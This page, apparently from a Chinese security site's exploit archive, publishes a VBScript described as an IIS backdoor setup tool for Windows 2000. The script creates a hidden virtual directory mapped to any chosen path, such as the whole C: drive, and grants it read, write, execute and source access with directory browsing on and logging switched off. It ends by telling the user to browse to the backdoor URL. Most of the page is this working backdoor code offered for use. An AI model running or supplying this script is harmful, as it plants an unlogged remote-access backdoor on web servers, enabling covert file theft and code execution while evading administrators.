首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IIS后门设置脚本 FOR WIN2000
来源:vfocus.net 作者:vfocus 发布时间:2004-05-21  

IIS后门设置器 FOR WIN2000

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'
' IIS.VBS
'
' Author: vfocus
' Date: 21/05/04
' Web: http://www.vfocus.net http://www.safechina.net
'
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
help1="IIS后门设置脚本 FOR WIN2000"
help2="请输入正确的虚拟目录名称和映射的路径,格式如下"
help3=" cscript.exe iis.vbs 虚拟目录的名称 映射的路径"
help4="例如: cscript.exe iis.vbs vitter c:\"

set Args = Wscript.Arguments
if args.count < 2 then
wscript.echo help1
wscript.echo ""
wscript.echo help2
wscript.echo ""
wscript.echo help3
wscript.echo ""
wscript.echo help4
wscript.quit
end if

strVRName=args(0) ''虚拟目录名称
strRootPath=args(1) ''虚拟目录路径

Set checkVirtualDir=GetObject("IIS://LocalHost/W3SVC/1/Root")
For each VR in checkVirtualDir
if VR.Name="vfocus" Then
foundt ="yes"
else
foundt= "no"
End If
Next

if foundt ="yes" then
wscript.echo "发现已经创建了vfocus目录,正在设置自定义的虚拟目录"
creatvdir
else
wscript.echo "正在创建vfocus目录,以及自定义文件夹,请等待!"
creatvfocus
creatvdir
end if

wscript.echo "您创建的虚拟目录名称是"& strVRName &",映射的文件夹是 " & strRootPath &"。"
wscript.echo "请访问http://IP/vfocus/"& strVRName &"/ 来连接后门!"
wscript.echo "恭喜!后门设置全部完成!"
sub creatvfocus()
Set objDir=GetObject("IIS://LocalHost/W3SVC/1/Root")
Set myDir=objDir.Create("IISWebVirtualDir","vfocus")
myDir.AccessRead=true
myDir.DefaultDoc=mydir.DefaultDoc
myDir.AppIsolated=0
myDir.AccessExecute=true
myDir.DontLog=true
myDir.AccessSource=true
myDir.EnableDirBrowsing=true
myDir.setinfo
end sub
sub creatvdir()
Set objVirtualDir=GetObject("IIS://LocalHost/W3SVC/1/Root/vfocus")
Set VirDir=objVirtualDir.Create("IISWebVirtualDir",strVRName)
VirDir.AccessRead=true
VirDir.Path=strRootPath
VirDir.DefaultDoc=""
VirDir.AccessExecute=true
VirDir.AccessWrite=true
VirDir.AccessSource=true
VirDir.AppIsolated=0
VirDir.DontLog=true
VirDir.EnableDirBrowsing=true
VirDir.appcreate 0
VirDir.CreateProcessAsUser=0
VirDir.setInfo
end sub
wscript.quit



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·动网上传漏洞利用工具Gui版(De
·Linux FreeBSD CVS exploit
·BBSXP setup.asp top function i
·cvs_solaris_HEAP.c
·Envymask 写的DVBBS UPFILES EXP
·Local Exploit for a buffer ove
·Symantec Multiple Firewall DNS
·smartass.pl
·Uploading shellcode v0.2 with
·linx86_sendmail.c
·Local AIX getlvcb Exploit
·WS_FTP FTPD "STAT"命令远程溢出
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved